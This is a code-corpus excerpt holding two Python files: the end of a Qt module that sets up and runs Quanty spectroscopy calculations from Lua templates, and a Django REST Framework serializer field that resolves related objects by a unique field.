valenceOccupancy += 1
(coreSubshell,) = self.edge.coreSubshells
(coreOccupancy,) = self.edge.coreOccupancies
coreOccupancy -= 1
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(coreSubshell, valenceSubshell),
occupancies=(coreOccupancy, valenceOccupancy),
)
configurations.append(finalConfiguration)
else:
if not self.experiment.excitesToVacuum:
valenceOccupancy += 1
core1Subshell, core2Subshell = self.edge.coreSubshells
core1Occupancy, core2Occupancy = self.edge.coreOccupancies
core1Occupancy -= 1
core2Occupancy -= 1
intermediateConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(core1Subshell, valenceSubshell),
occupancies=(core1Occupancy, valenceOccupancy),
)
configurations.append(intermediateConfiguration)
if core2Subshell == valenceSubshell:
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(valenceSubshell,),
occupancies=(valenceOccupancy - 1,),
)
else:
finalConfiguration = Configuration.fromSubshellsAndOccupancies(
subshells=(core2Subshell, valenceSubshell),
occupancies=(core2Occupancy, valenceOccupancy),
)
configurations.append(finalConfiguration)
return configurations
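    # For illustration of the configurations above (not from the original
    # source): a one-step L2,3 (2p) XAS calculation on Ni2+ starts from a 3d
    # shell with 8 electrons and ends with a 2p core hole (occupancy 5) and 9
    # valence electrons.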
@property
def replacements(self):
"""Replacements dictionary used to fill the calculation template. The
construction of more complex items is delegated to the respective object.
"""
replacements = dict()
        # Values read from the application settings.
replacements["Verbosity"] = settings.value("Quanty/Verbosity")
replacements["DenseBorder"] = settings.value("Quanty/DenseBorder")
replacements["ShiftToZero"] = settings.value("Quanty/ShiftSpectra")
subshell = self.element.valenceSubshell
occupancy = self.element.valenceOccupancy
replacements[f"NElectrons_{subshell}"] = occupancy
replacements["Temperature"] = self.temperature.value
replacements["Prefix"] = self.value
replacements.update(self.axes.xaxis.replacements)
if self.experiment.isTwoDimensional:
replacements.update(self.axes.yaxis.replacements)
replacements.update(self.spectra.replacements)
replacements.update(self.hamiltonian.replacements)
return replacements
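    # For illustration (assumed defaults, not from the original source): the
    # default Ni2+ Oh XAS L2,3 calculation produces entries such as
    # "NElectrons_3d": 8, "Temperature": 10, and "Prefix": "Ni2+_Oh_XAS_2p".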
@property
def input(self):
path = resourceAbsolutePath(
os.path.join("quanty", "templates", f"{self.templateName}")
)
try:
with open(path) as fp:
template = fp.read()
except FileNotFoundError as e:
message = f"Could not find the template file {self.templateName}."
logger.error(message)
raise e
for pattern, replacement in self.replacements.items():
# True/False in Lua are lowercase.
if isinstance(replacement, bool):
replacement = str(replacement).lower()
else:
replacement = str(replacement)
template = template.replace(f"${pattern}", str(replacement))
return template
@property
def inputName(self):
return f"{self.value}.lua"
@property
def output(self):
return self.runner.output
# @property
# def summary(self):
# return f"Summary for {self.value}"
def saveInput(self):
# TODO: Is this too hidden?
os.chdir(settings.value("CurrentPath"))
with open(self.inputName, "w") as fp:
fp.write(self.input)
def run(self):
# Don't crash if something went wrong when saving the input file.
try:
self.saveInput()
except FileNotFoundError:
return
self.runner.run(self.inputName)
def process(self, successful):
if not successful:
return
# TODO: Check if loading the spectra was successful.
self.spectra.load()
def stop(self):
self.runner.kill()
def clean(self):
os.remove(f"{self.value}.lua")
# Remove the spectra.
for spectrum in glob.glob(f"{self.value}*.spec"):
os.remove(spectrum)
def copyFrom(self, item):
super().copyFrom(item)
self.temperature.copyFrom(item.temperature)
self.magneticField.copyFrom(item.magneticField)
self.axes.copyFrom(item.axes)
self.spectra.copyFrom(item.spectra)
self.hamiltonian.copyFrom(item.hamiltonian)
def main():
pass
if __name__ == "__main__":
main()
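# A minimal usage sketch (illustrative only, not part of the original module);
# it assumes the path to the Quanty executable has been set in the preferences:
#
#     calculation = Calculation(symbol="Ni", charge="2+", symmetry="Oh",
#                               experiment="XAS", edge="L2,3 (2p)")
#     calculation.saveInput()  # writes the Lua input file in the current path
#     calculation.run()        # starts Quanty asynchronously via QProcess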
| 31.88785 | 95 | 0.59521 | ["MIT"] | jminar/crispy | crispy/gui/quanty/calculation.py | 23,886 | Python |
from django.core.exceptions import ObjectDoesNotExist
from rest_framework.serializers import PrimaryKeyRelatedField, RelatedField
class UniqueRelatedField(RelatedField):
"""
Like rest_framework's PrimaryKeyRelatedField, but selecting by any unique
field instead of the primary key.
"""
default_error_messages = PrimaryKeyRelatedField.default_error_messages.copy()
def __init__(self, field_name, serializer_field=None, **kwargs):
super().__init__(**kwargs)
self.related_field_name = field_name
self.serializer_field = serializer_field
def to_internal_value(self, data):
if self.serializer_field is not None:
data = self.serializer_field.to_internal_value(data)
try:
return self.get_queryset().get(**{self.related_field_name: data})
except ObjectDoesNotExist:
self.fail('does_not_exist', pk_value=data)
except (TypeError, ValueError):
self.fail('incorrect_type', data_type=type(data).__name__)
def to_representation(self, value):
value = getattr(value, self.related_field_name)
if self.serializer_field is not None:
value = self.serializer_field.to_representation(value)
return value
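# A minimal usage sketch (illustrative only; the Product model, its unique
# "sku" field, and the surrounding serializer are hypothetical):
#
#     from rest_framework import serializers
#
#     class OrderItemSerializer(serializers.ModelSerializer):
#         product = UniqueRelatedField(
#             field_name="sku",
#             serializer_field=serializers.CharField(),
#             queryset=Product.objects.all(),
#         )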
| 38.181818 | 81 | 0.711111 | ["MIT"] | azengard/reseller-api | apps/api/serializers.py | 1,260 | Python |